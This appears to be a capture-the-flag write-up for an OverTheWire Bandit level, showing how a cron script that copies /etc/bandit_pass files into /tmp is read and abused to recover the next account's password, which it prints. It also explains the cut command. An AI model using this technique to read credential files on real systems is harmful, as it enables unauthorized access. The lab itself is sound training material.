ls /etc/cron.d

cat /etc/cron.d/cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null

cat /usr/bin/cronjob_bandit23.sh

#!/bin/bash
myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)
echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"
cat /etc/bandit_pass/$myname > /tmp/$mytarget

echo "I am user bandit23" | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349  -

NOTE:
cut command used to extract sections from lines of input
-d ' ', sets the delimiter to ' '
-f 1, extracts field 1

cat /tmp/8ca319486bfbbc3663ea0fbe81326349

password: 0Zf11ioIjMVN551jX3CmStKLYqjk54Ga
